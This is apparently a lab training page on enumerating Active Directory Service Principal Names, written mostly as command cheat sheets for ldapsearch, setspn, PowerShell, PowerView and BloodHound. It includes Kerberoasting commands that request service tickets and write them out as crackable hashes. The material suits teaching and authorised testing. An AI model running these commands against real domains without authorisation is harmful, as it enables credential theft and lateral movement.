Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Service Principals

Enumeration

SPN enumeration tells us which services exist and which account owns each service key. That ownership is the important part. A ticket for an SPN is encrypted with the owner account's key, so every Kerberoast, Silver Ticket, and delegation decision starts with SPN ownership.

Variables

export DOMAIN=ootw.local
export DC=10.10.10.200
export USER=student
export PASS='student'
export BASE='DC=ootw,DC=local'

All SPN-bearing users

ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306368)(servicePrincipalName=*))' sAMAccountName servicePrincipalName memberOf userAccountControl msDS-SupportedEncryptionTypes

All SPN-bearing computers

ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(&(samAccountType=805306369)(servicePrincipalName=*))' sAMAccountName dNSHostName servicePrincipalName userAccountControl

All SPNs

ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=*)' sAMAccountName dNSHostName servicePrincipalName distinguishedName

Find specific service class

ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=MSSQLSvc/*)' sAMAccountName servicePrincipalName
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=HTTP/*)' sAMAccountName servicePrincipalName
ldapsearch -LLL -x -H ldap://$DC -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(servicePrincipalName=cifs/*)' sAMAccountName servicePrincipalName

Kerberoastable users

GetUserSPNs.py "$DOMAIN/$USER:$PASS" -dc-ip $DC
nxc ldap $DC -u "$USER" -p "$PASS" --kerberoast kerberoast.hashes

Request one SPN

GetUserSPNs.py "$DOMAIN/$USER:$PASS" -dc-ip $DC -request-user svc_sql -outputfile svc_sql.hash

Windows setspn

setspn -Q */*
setspn -Q MSSQLSvc/*
setspn -Q HTTP/*
setspn -Q cifs/*
setspn -L OOTW\svc_sql
setspn -X

PowerShell

Get-ADUser -LDAPFilter '(servicePrincipalName=*)' -Properties servicePrincipalName,msDS-SupportedEncryptionTypes |
  Select-Object SamAccountName,ServicePrincipalName,msDS-SupportedEncryptionTypes

Get-ADComputer -LDAPFilter '(servicePrincipalName=*)' -Properties dNSHostName,servicePrincipalName |
  Select-Object SamAccountName,dNSHostName,ServicePrincipalName

PowerView

Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Get-DomainComputer -Properties samaccountname,dnshostname,serviceprincipalname | Where-Object {$_.serviceprincipalname}
Get-DomainSPNTicket -SPN 'MSSQLSvc/sql01.ootw.local:1433' -OutputFormat Hashcat

BloodHound collection

bloodhound-python -u "$USER" -p "$PASS" -d "$DOMAIN" -ns "$DC" -c DCOnly,SPN,ACL,Session -zip

Record

SPN string
Owner account
Owner type: user, computer, gMSA
Service class
Host portion
Port or instance if present
Encryption types
Delegation attributes
ACL write paths to the owner account